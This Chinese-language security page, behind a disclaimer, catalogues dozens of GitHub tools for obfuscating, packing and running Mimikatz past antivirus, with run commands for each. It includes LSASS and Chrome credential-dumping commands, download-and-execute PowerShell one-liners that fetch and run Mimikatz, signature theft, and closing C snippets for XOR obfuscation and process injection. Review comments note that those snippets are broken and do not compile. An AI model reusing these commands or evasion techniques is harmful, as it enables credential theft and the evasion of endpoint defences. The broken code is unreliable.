免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
只供对已授权的目标进行测试,对未授权目标的测试作者不承担责任,均由使用者本人自行承担。
文章正文
go-mimikatz
go build./go-mimikatz
https://github.com/vyrus001/go-mimikatz
Rusty Mimikatz12 cargo build --release./target/release/mimikatz-rs
https://github.com/memN0ps/mimikatz-rs
MimikatzFUD
.\Invoke-M1m1fud2.ps1
https://github.com/HernanRodriguez1/MimikatzFUD
pypykatz1234 pip install -r requirements.txtpython pypykatz.pypython pypykatz.py lsa minidump -d ./lsass.dmp sekurlsa::logonpasswordspython pypykatz.py wmi "SELECT * FROM Win32_Process WHERE Name="lsass.exe"" sekurlsa::logonpasswords
https://github.com/skelsec/pypykatz
BetterSafetyKatz
.\BetterSafetyKatz.exe --DumpCreds.\BetterSafetyKatz.exe --Minidump "C:\Windows\Temp\lsass.dmp" --DumpCreds.\BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds.\BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds
https://github.com/Flangvik/BetterSafetyKatz
CopyCat1234 .\CopyCat.exe --dump --local.\CopyCat.exe --memory "C:\Windows\Temp\memdump.raw" --dump.\CopyCat.exe --hibernation "C:\Windows\hiberfil.sys" --dump.\CopyCat.exe --dump --target "192.168.1.100" --username "domain\username" --password "password123"
https://github.com/mobdk/CopyCat
PyFuscation
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1
https://github.com/CBHue/PyFuscation
Invoke-Cats123 Invoke-Cats -pwds Invoke-Cats -certs Invoke-Cats -CustomCommand
https://github.com/DanMcInerney/Invoke-Cats
WinBoost
csc.exe /platform:x64 /target:exe /unsafe winboost.cs
https://github.com/mobdk/WinBoost
mimidogz1 .\Invoke-Mimidogz.ps1
https://github.com/fir3d0g/mimidogz
CoreClass
"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.Add a reference to `System.Management.Automation.dll` in your project. To do this, right-click on your project in the solution explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies" and search for "System.Management.Automation". Select it and click "Add".
https://github.com/mobdk/CoreClass
SharpMimikatz1 SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
https://github.com/XTeam-Wing/SharpMimikatz
Invoke-Obfuscation
Set-ExecutionPolicy UnrestrictedImport-Module .\Invoke-Obfuscation.psd1Invoke-Obfuscation -ScriptPath C:\Path\To\MyScript.ps1 -Command All
https://github.com/danielbohannon/Invoke-Obfuscation
SimpleMimikatzObfuscator1 Commands.txt
https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
ClickOnceKatz
pip install pycryptodome requestspython build.pyHost the "publish" directory on a web server or file share accessible to the target machine.On the target machine, navigate to the URL of the ClickOnce package in a web browser.
https://github.com/sinmygit/ClickOnceKatz
pymemimporter123456789101112 import base64import pymemimporter# Load the base64-encoded module into memoryencoded_module = b"YOUR_BASE64_ENCODED_MODULE_HERE"module_data = base64.b64decode(encoded_module)# Import the module from memorymem_importer = pymemimporter.PyMemImporter()loaded_module = mem_importer.load_module("", module_data)base64 -w0 .py > .base64python <script_name>.py
https://github.com/n1nj4sec/pymemimporter
SharpDPAPI
dotnet run --project .\SharpDPAPI\SharpDPAPI.csprojdotnet run --project .\SharpDPAPI\SharpDPAPI.csproj masterkeysdotnet run --project .\SharpDPAPI\SharpDPAPI.csproj domainbackupkeys
https://github.com/GhostPack/SharpDPAPI
Plog123 privilege::debugsekurlsa::Plog
https://github.com/GamehunterKaan/Plog
StegoKatz
.\StegoKatz.ps1 -Embed -FilePath -ImagePath -OutputPath .\StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt
https://github.com/r13mann/StegoKatz
LoadMimikatzWithDinvoke.cs12 mimi.bat.\rundll32-hijack.ps1
https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs
mimikatz-bypass
Invoke-WebRequest /corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1Set-ExecutionPolicy Unrestricted.\mimikatz-bypass.ps1
https://github.com/corneacristian/mimikatz-bypass
Utils12 dotnet build -r win10-x64katz.exe
https://github.com/ITh4cker/Utils
Eyeworm
python3 eyeworm.py -t -c -o python3 eyeworm.py -i -p -o
https://github.com/imsellbaox/Eyeworm
drunkenkatz1 beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"
https://github.com/ap3r/drunkenkatz
CallBack
python3 CallBack.py -i -p
https://github.com/mobdk/CallBack
mimikatz-byPass-Huorong1 python mimikatz_byPass_Huorong.py
https://github.com/q1ya/mimikatz-byPass-Huorong
mimikatz_bypass
python mimikatz_bypass.py
https://github.com/wangfly-me/mimikatz_bypass
HTML-mimikatz-1 cmd.exe mimikatz.html
https://github.com/vipserver/HTML-mimikatz-
Mimikatz.exe-in-JS
cmd.exe mimikatz.js
https://github.com/hardw00t/Mimikatz.exe-in-JS
-Have-You-Seen-These-Katz-12345678910111213 sed -i -e "s/Invoke-Mimikatz/Invoke-Mimidogz/g" Invoke-Mimikatz.ps1sed -i -e "/<#/,/#>/c\\" Invoke-Mimikatz.ps1sed -i -e "s/^[[:space:]]*#.*$//g" Invoke-Mimikatz.ps1sed -i -e "s/DumpCreds/DumpCred/g" Invoke-Mimikatz.ps1sed -i -e "s/ArgumentPtr/NotTodayPal/g" Invoke-Mimikatz.ps1sed -i -e "s/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g" Invoke-Mimikatz.ps1sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-
MimiRunner
rundll32 *.log,#1
https://github.com/mobdk/MimiRunner
Mimikatz-PE-Injection1234567 powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile("/Dopn98","katz.cs"); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.**** In the above command "/out:katz.exe katz.cs" the "katz.cs" should be the path where initially powershell downloads the CS file ***powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile("/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a","katz.cs"); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe \\share_ip\share_name\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile("/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a","katz.cs"); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe %temp%\\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* && move mimikatz.log %temp%\\katz.log && cd %temp% && del %temp%\\katz.cs
https://github.com/analyticsearch/Mimikatz-PE-Injection
ninifox
.\Invoke-NiNifox.ps1
https://github.com/scottjosh/ninifox
Chexport12345 dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect``dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data For Account" /unprotect``dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
https://github.com/GamehunterKaan/Chexport
mimik
mimikatz.exemprotected.exemprotected.jpg.exemprotected.jpg.7z
https://github.com/MisterLobster22/mimik
my-obfuscated-mimikatz1 eric.ps1
https://github.com/lazaars/my-obfuscated-mimikatz
Invoke-Mimikatz-W10
.\Invoke-Mimikatz.ps1
https://github.com/VDA-Labs/Invoke-Mimikatz-W10
MimiVader1 python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py
https://github.com/lawja/MimiVader
Invoke-Mimikatz
.\Invoke-Mimikatz
https://github.com/syn-ack-zack/Invoke-Mimikatz
Invoke-Mimikatz1 .\invokemimikatz.ps1
https://github.com/dfirdeferred/Invoke-Mimikatz
mimikatz_bypass
.\XInvoke-Mimikatz.ps1.\wi10_Invoke-Mimikatz.ps1
https://github.com/izj007/mimikatz_bypass
JS_MimiKatzDropper1 cscript.exe dropper.js
https://github.com/leinn32/JS_MimiKatzDropper
mimicats
Invoke-Expression (New-Object Net.Webclient).downloadstring("/Moon1705/mimicats/master/Mimicats.ps1") Invoke-Cats -Command ""privilege::debug""
https://github.com/Moon1705/mimicats
XorPacker1 python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED
https://github.com/tmenochet/XorPacker
PEzor
PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p ""coffee" "sleep 5000" "coffee" "exit""
https://github.com/phra/PEzor
AtomPePacker1 PePacker.exe mimikatz.exe -e
https://github.com/NUL0x4C/AtomPePacker
Nim-RunPE
nim c -d:args NimRunPE.nim
https://github.com/S3cur3Th1sSh1t/Nim-RunPE
Nimcrypt212 nim c -d:release nimcrypt2.nim./nimcrypt2 --encrypt --keyfile=mykey.txt --inFile=plaintext.txt --outFile=ciphertext.txt
https://github.com/icyguider/Nimcrypt2
ProtectMyTooling
py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe
https://github.com/mgeeky/ProtectMyTooling
xencrypt12 Import-Module ./xencrypt.ps1 Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
https://github.com/the-xentropy/xencrypt
BetterXencrypt
Import-Module ./betterxencrypt.ps1 Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
https://github.com/GetRektBoy724/BetterXencrypt
AES-Encoder12 Invoke-AES-Encoder -InFile invoke-mimikatz.ps1 -OutFile aesmimi.ps1
https://github.com/Chainski/AES-Encoder
mortar
./encryptor -f mimikatz.exe -o bin.encdeliver.exe -d -c sekurlsa::logonpasswords -f bin.enc
https://github.com/0xsp-SRD/mortar
.NET-Crypter12 Browse Executable:Generate Encryption:
https://github.com/roast247/.NET-Crypter
Custom mods + Invoke-Obfuscation
sed- e "/<#/,/#>/c\\" "$1"sed"s/^[[: space: ]]*#.*$//g" "$1"- esed"s/Invoke-Mimikatz/RainbowsAndUnicorns/g" "$1"- eT"Tsed-e"s/DumpCreds/MoreRainbows/g" "$1"Invoke-Obfuscation -ScriptPath "./Invoke-Mimikatz.ps1’ -Command "Token\All\1\Out full_power.ps1’ -QuietInvoke-Obfuscation -ScriptPath ".\2.IM_critical_words.ps1" -Command "Token\Variable\1’ -Quiet > final.ps1IEX (New-object Net. Webclient) .Downloadstring("http: //192.168.1.104:8000/final.ps1") ; RainbowsAndUnicorns -MoreRainbows
https://github.com/newlog/fud_mimikatz_talk
Obfuscated_Invoke-Mimikatz12345678 sed -i -e "s/Invoke-Mimikatz/Invoke-LSASSscraper/g" Invoke-Mimikatz.ps1sed -i -e "/<#/,/#>/c\\" Invoke-Mimikatz.ps1sed -i -e "s/^[[:space:]]*#.*$//g" Invoke-Mimikatz.ps1sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions#\-/g" Invoke-Mimikatz.ps1 Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery –Force Import-Module .\obfuscat_Invoke-Mimikatz.ps1 Invoke-LSASSscraper
https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz
mimikatz_encoded
certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit
https://github.com/mobx26/mimikatz_encoded
Encrypted_Mimikatz12 .\decrypt.ps1.\mimikatz.exe "sekurlsa::logonPasswords full" exit
https://github.com/Sombody101/Encrypted_Mimikatz
SigThief
sigthief.py -i c: \Windows\System32\consent.exe -t mimikatz. exe -o MSCredentialTool.exe
https://github.com/secretsquirrel/SigThief
/* memory+suspended
 *
 * NOTE(review): both #include lines lost their header names in extraction (the
 * angle-bracket text was swallowed as markup), so the snippet does not compile
 * as shown. The `cmd` literal below contains unescaped inner double quotes,
 * which end the string literal early (another compile error), and `cmd` is
 * never referenced anywhere in the program.
 *
 * From a monitoring standpoint the OpenProcess / VirtualAllocEx /
 * WriteProcessMemory / CreateRemoteThread(LoadLibraryA) sequence in main() is
 * the textbook remote-thread DLL-injection pattern (MITRE ATT&CK T1055.001);
 * endpoint sensors flag the API sequence itself, independent of the payload.
 */
#include
#include

const char* cmd = "powershell.exe -windowstyle hidden -command \"IEX (New-Object Net.WebClient).DownloadString("/gentilkiwi/mimikatz/master/mimikatz.ps1"); Invoke-Mimikatz -DumpCreds\"";

/* XORs every byte of a NUL-terminated string with 0x41, in place.
 * A single-byte XOR is its own inverse: this is reversible encoding, not
 * encryption, and the key is a visible constant in the binary. */
void obfuscate(char* str){
    int len = strlen(str);
    for (int i = 0; i < len; i++) {
        str[i] = str[i] ^ 0x41;
    }
}

int main(){
    /* NOTE(review): `encoded_cmd` points at a string literal and obfuscate()
     * writes through it. Modifying a string literal is undefined behaviour
     * (C11 6.4.5); MSVC typically places literals in read-only memory, so this
     * faults before any of the API calls below run. The literal appears to be
     * base64 text; after the XOR pass it is neither base64 nor a usable path. */
    char* encoded_cmd = "YWxpY2UgY29tbWFuZCAtIHdpbmRvd3N0eWxlIGhpZGRlbjsgLWNvbW1hbmQgIklFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXdAZ2VudGlsa2l3aS9taW1pa2F0ei9tZXRhZGF0YS9taW1pa2F0ei5wczEnKTsgSW52b2tlLU1pbWlrYXR6IC1EdW1wQ3JlZHMK\"";
    obfuscate(encoded_cmd);
    /* The "remote" process is the current process: OpenProcess on its own PID. */
    DWORD pid = GetCurrentProcessId();
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (process == NULL) {
        printf("Error opening process. Error code: %lu\n", GetLastError());
        return 1;
    }
    /* strlen() excludes the terminator, so the buffer allocated and written
     * below is not NUL-terminated. */
    LPVOID remote_string = VirtualAllocEx(process, NULL, strlen(encoded_cmd), MEM_COMMIT, PAGE_READWRITE);
    if (remote_string == NULL) {
        printf("Error allocating memory. Error code: %lu\n", GetLastError());
        CloseHandle(process);
        return 1;
    }
    BOOL write_result = WriteProcessMemory(process, remote_string, encoded_cmd, strlen(encoded_cmd), NULL);
    if (!write_result) {
        printf("Error writing to process memory. Error code: %lu\n", GetLastError());
        CloseHandle(process);
        return 1;
    }
    /* The new thread runs LoadLibraryA() with the XOR'd blob as its path
     * argument, i.e. it attempts to load a DLL by a garbage name and fails;
     * nothing else is executed by this program. */
    HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, remote_string, 0, NULL);
    if (thread == NULL) {
        printf("Error creating remote thread. Error code: %lu\n", GetLastError());
        CloseHandle(process);
        return 1;
    }
    WaitForSingleObject(thread, INFINITE);
    /* NOTE(review): VirtualFreeEx with MEM_RELEASE requires dwSize == 0, so
     * passing strlen() makes this call fail (return value unchecked); the
     * `thread` handle is never closed. */
    VirtualFreeEx(process, remote_string, strlen(encoded_cmd), MEM_RELEASE);
    CloseHandle(process);
    return 0;
}
XOR’d with 0xFF
/* NOTE(review): both #include lines lost their header names in extraction, so
 * the snippet does not compile as shown. */
#include
#include
using namespace std;

/* XORs every byte of a NUL-terminated string with 0xFF, in place.
 * Applying it twice restores the input: this is reversible encoding, not
 * encryption, and the single-byte key is a visible constant in the binary. */
void obfuscate(char* s) {
    for (int i = 0; s[i]; i++) {
        s[i] = s[i] ^ 0xFF;
    }
}

/* Demo: encode "password123", print it, decode it, print it again. */
int main() {
    char* str = new char[20];
    strcpy(str, "password123");   // 12 bytes including the terminator; fits in 20
    // Obfuscate the string
    obfuscate(str);
    // Print the obfuscated string (every byte is now >= 0x80, i.e. outside
    // printable ASCII, so this line prints garbage)
    cout << str << endl;
    // Restore the original string
    obfuscate(str);
    // Print the original string
    cout << str << endl;
    delete[] str;
    return 0;
}
/* XORing each character with the value 0xAA
 *
 * NOTE(review): the three #include lines lost their header names in
 * extraction, so the snippet does not compile as shown.
 *
 * NOTE(review): this program copies three XOR-encoded ASCII strings into an
 * RWX region and then calls that region as a function. Text bytes are not
 * machine code, so the call faults or behaves unpredictably; as written the
 * program cannot execute anything. VirtualAlloc()'s result is never checked
 * for NULL either. A single-byte XOR is trivially reversible, so the encoded
 * file names remain recoverable from the binary.
 */
#include
#include
#include

int main(){
    char str1[] = "mimikatz.exe";
    char str2[] = "powershell.exe";
    char str3[] = "cmd.exe /c mimikatz.exe";
    /* strlen() excludes the terminator, so the loops below leave each NUL intact. */
    int len1 = strlen(str1);
    int len2 = strlen(str2);
    int len3 = strlen(str3);
    for(int i = 0; i < len1; i++) {
        str1[i] = str1[i] ^ 0xAA;
    }
    for(int i = 0; i < len2; i++) {
        str2[i] = str2[i] ^ 0xAA;
    }
    for(int i = 0; i < len3; i++) {
        str3[i] = str3[i] ^ 0xAA;
    }
    /* sizeof(strN) counts the terminator, so the three arrays are copied
     * back-to-back including their NULs. */
    void* mem = VirtualAlloc(NULL, sizeof(str1) + sizeof(str2) + sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(mem, str1, sizeof(str1));
    memcpy((char*)mem + sizeof(str1), str2, sizeof(str2));
    memcpy((char*)mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3));
    /* Transfers control to the copied text bytes (see NOTE above). */
    ((void(*)())mem)();
    return 0;
}
Decoding and storing it in memory
/* NOTE(review): both #include lines lost their header names in extraction, so
 * the snippet does not compile as shown.
 *
 * NOTE(review): `encodedCmd` contains embedded "\x00" bytes (the first at
 * index 8), and every size below is computed with strlen(), which stops at
 * the first NUL. Only the first 8 bytes ("\x44\x43\x4D\x53\x63\x72\x61\x70",
 * plain ASCII text rather than machine code) are allocated, written and then
 * started as a thread entry point, so the target thread faults immediately.
 * No return value is checked: FindWindowA() returns NULL when no window
 * titled "Window Name" exists, GetWindowThreadProcessId() then fails and
 * `pid` is most likely used uninitialized, and OpenProcess()/VirtualAllocEx()
 * may return NULL.
 *
 * The OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
 * sequence is the generic process-injection pattern (MITRE ATT&CK T1055) that
 * endpoint sensors alert on regardless of the bytes written.
 */
#include
#include

int main(){
    const char* encodedCmd = "\x44\x43\x4D\x53\x63\x72\x61\x70\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x62\x00\x2D\x6E\x6F\x70\x23\x00\x2D\x6E\x6F\x70\x69\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x77\x00\x2D\x70\x00\x2D\x65\x00\x2D\x74\x00\x2D\x72\x00\x2D\x75\x00\x2D\x6E\x00\x20\x22\x26\x28\x2A\x2C\x2E\x30\x32\x34\x36\x38\x3A\x3C\x3E\x40\x42\x44\x46\x48\x4A\x4C\x4E\x50\x52\x54\x56\x58\x5A\x5C\x5E\x60\x62\x64\x66\x68\x6A\x6C\x6E\x70\x72\x74\x76\x78\x7A\x7C\x7E\x80\x82\x84\x86\x88\x8A\x8C\x8E\x90\x92\x94\x96\x98\x9A\x9C\x9E\xA0\xA2\xA4\xA6\xA8\xAA\xAC\xAE\xB0\xB2\xB4\xB6\xB8\xBA\xBC\xBE\xC0\xC2\xC4\xC6\xC8\xCA\xCC\xCE\xD0\xD2\xD4\xD6\xD8\xDA\xDC\xDE\xE0\xE2\xE4\xE6\xE8\xEA\xEC\xEE\xF0\xF2\xF4\xF6\xF8\xFA\xFC\xFE\x00\x22";
    DWORD pid;
    /* Target selection by window title; NULL if no such window is open. */
    HWND hwnd = FindWindowA(NULL, "Window Name");
    GetWindowThreadProcessId(hwnd, &pid);
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    /* strlen() here yields 8 because of the embedded NUL at index 8. */
    LPVOID allocSpace = VirtualAllocEx(hProc, NULL, strlen(encodedCmd), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, allocSpace, encodedCmd, strlen(encodedCmd), NULL);
    /* dwStackSize and dwCreationFlags receive NULL (a pointer constant) where
     * an integer is expected; the thread is started at the copied text bytes. */
    HANDLE hThread = CreateRemoteThread(hProc, NULL, NULL, (LPTHREAD_START_ROUTINE)allocSpace, NULL, NULL, NULL);
    CloseHandle(hThread);
    CloseHandle(hProc);
    return 0;
}
/* Inject and execute Mimikatz in memory
 *
 * NOTE(review): the four #include lines lost their header names in
 * extraction, so the snippet does not compile as shown.
 *
 * NOTE(review): despite the caption, nothing is injected into another process.
 * The program reads a file's raw bytes into its own address space, copies them
 * to an RWX region and starts a thread at the first byte of that copy. The
 * first bytes of a raw executable file are its file header, not code, so the
 * thread faults; this snippet cannot run the executable as written.
 * No return value is checked (CreateFileA() may return INVALID_HANDLE_VALUE,
 * malloc()/VirtualAlloc() may return NULL, ReadFile() may read fewer than
 * dwFileSize bytes); `pbFileData` is never freed, `hThread` is never closed,
 * and `dwExitCode` is read but never used.
 */
#include
#include
#include
#include

/* Placeholder path as given on the page. */
#define MIMIKATZ_PATH "C:\\path\\to\\mimikatz.exe"

int main(){
    // Load Mimikatz into memory
    HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    DWORD dwFileSize = GetFileSize(hFile, NULL);
    BYTE* pbFileData = (BYTE*)malloc(dwFileSize);
    DWORD dwBytesRead;
    ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL);
    CloseHandle(hFile);
    // Allocate memory for Mimikatz (RWX, in the current process)
    LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    // Copy Mimikatz to allocated memory (raw file bytes, see NOTE above)
    memcpy(lpMem, pbFileData, dwFileSize);
    // Execute Mimikatz: the thread starts at offset 0 of the raw file copy
    DWORD dwExitCode;
    DWORD dwThreadId;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId);
    WaitForSingleObject(hThread, INFINITE);
    GetExitCodeThread(hThread, &dwExitCode);
    // Free allocated memory (pbFileData and hThread are leaked)
    VirtualFree(lpMem, 0, MEM_RELEASE);
    return 0;
}